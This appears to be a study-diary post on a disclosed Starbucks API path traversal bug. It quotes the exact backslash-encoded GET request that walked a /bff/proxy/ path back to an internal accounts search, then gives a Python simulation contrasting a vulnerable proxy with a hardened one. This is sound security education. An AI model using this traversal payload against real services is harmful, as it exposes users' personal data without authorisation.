Day 91 comes with some reading on Sam Curry's find in Starbucks.
Into Starbucks Database
From Sam (CoffeeJunkie). Reading this post from Sam Curry, it was useful to see how handy path traversal vulnerabilities still are these days. He found a call in the Starbucks API, routed through the app's /bff/proxy/ endpoint, that could retrieve the information of nearly 100 million users with the following path traversal attack:
GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\ HTTP/1.1
Host: app.starbucks.com
The six ..\ segments (one for each of stream, v1, users, me, streamItems and web) walk the forwarded path back to the root of the internal API, so what the proxy actually requests upstream is the path
\search\v1\Accounts\ which retrieves the information of nearly 100 million users. The separators are backslashes rather than the usual ../ form, which the front end let through untouched while the backend still treated them as path separators.
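The following is an added simulation of the traversal above, not code from the write-up or from Starbucks. It assumes the proxy strips the /bff/proxy prefix and forwards the remainder to an internal host, and that the internal host treats a backslash as a path separator and resolves . and .. segments before routing; the allow-list prefix, the benign sample path and the helper names are assumptions chosen to illustrate the fix. It also shows why an allow-list check on the raw path is not enough: the raw request still begins with the permitted route, so only the resolved path reveals the escape.

```python
"""Simulated BFF proxy: vulnerable forwarding vs. normalise-then-allow-list.

Added example. The proxy and backend behaviour below is an assumption made
to reproduce the effect described in the write-up, not the real service.
"""

PROXY_PREFIX = "/bff/proxy"
# Assumed allow-list: the only upstream route this proxy entry should reach.
ALLOWED_UPSTREAM_PREFIX = "/stream/v1/users/me/streamItems/"

# Request path from the write-up, built with six "..\.\" pairs so the count is
# explicit. As a literal it reads:
#   web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\
TRAVERSAL_PATH = (
    "/bff/proxy/stream/v1/users/me/streamItems/"
    + "web" + "\\..\\." * 6 + "\\search\\v1\\Accounts\\"
)
# Constructed benign request for comparison.
BENIGN_PATH = "/bff/proxy/stream/v1/users/me/streamItems/web"


def normalize_upstream_path(path: str) -> str:
    """Resolve a path the way a backslash-tolerant backend might.

    '\\' is treated as a separator, '.' segments are dropped, '..' pops the
    previous segment (never above root). A trailing separator is preserved.
    This is an assumption about the backend, not documented behaviour.
    """
    ends_with_sep = path.endswith(("/", "\\"))
    parts = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    out = "/" + "/".join(parts)
    if ends_with_sep and parts:
        out += "/"
    return out


def raw_prefix_check_passes(request_path: str) -> bool:
    """The insufficient check: allow-list applied to the raw, unresolved path."""
    upstream = request_path[len(PROXY_PREFIX):]
    return upstream.startswith(ALLOWED_UPSTREAM_PREFIX)


def naive_proxy_target(request_path: str) -> str:
    """Vulnerable behaviour: strip the proxy prefix and forward whatever is left.

    Returns the path the backend would actually route after normalisation.
    """
    upstream = request_path[len(PROXY_PREFIX):]
    return normalize_upstream_path(upstream)


def hardened_proxy_target(request_path: str):
    """Normalise first, then enforce the allow-list on the resolved path.

    Returns the upstream path to forward, or None if the request is rejected.
    """
    upstream = request_path[len(PROXY_PREFIX):]
    # Defence in depth: this route never needs backslashes or dot-dot segments,
    # so reject them outright before any resolution happens.
    if "\\" in upstream or ".." in upstream.split("/"):
        return None
    resolved = normalize_upstream_path(upstream)
    if not resolved.startswith(ALLOWED_UPSTREAM_PREFIX):
        return None
    return resolved


if __name__ == "__main__":
    for label, path in (("traversal", TRAVERSAL_PATH), ("benign", BENIGN_PATH)):
        print(f"{label}:")
        print("  raw prefix check passes:", raw_prefix_check_passes(path))
        print("  naive proxy forwards to:", naive_proxy_target(path))
        print("  hardened proxy forwards to:", hardened_proxy_target(path))
```

Running it shows the traversal path passing the raw prefix check and being forwarded by the naive proxy as /search/v1/Accounts/, while the hardened proxy rejects it and still forwards the benign request unchanged.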